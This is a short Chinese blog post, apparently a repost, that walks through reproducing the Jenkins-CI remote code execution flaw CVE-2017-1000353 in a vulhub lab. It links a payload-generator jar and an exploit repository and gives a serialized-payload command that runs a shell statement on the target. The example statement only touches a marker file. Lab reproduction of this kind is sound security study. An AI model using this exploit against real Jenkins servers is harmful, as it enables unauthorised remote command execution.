首页 > 其他 > 详细

Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

时间:2021-02-09 17:56:36      阅读:15      评论:0      收藏:0      [点我收藏+]

漏洞原理

参考阅读 https://blogs.securiteam.com/index.php/archives/3171

1、准备环境
技术分享图片
访问页面 确保打开
技术分享图片
2、在攻击机上进行操作
首先下载生成POC的工具
https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar
执行命令
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/CVE-2017-1000353_is_success"(要执行的语句)
技术分享图片
下载脚本(直接git clone)
https://github.com/vulhub/CVE-2017-1000353

注意:这边git clone 后文件中也会有jenkins_poc.ser,要把刚刚生成的替换这个

执行攻击脚本
技术分享图片

到靶机上看看攻击是否执行了
技术分享图片

Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

原文:https://www.cnblogs.com/secutity-zbk/p/14392907.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!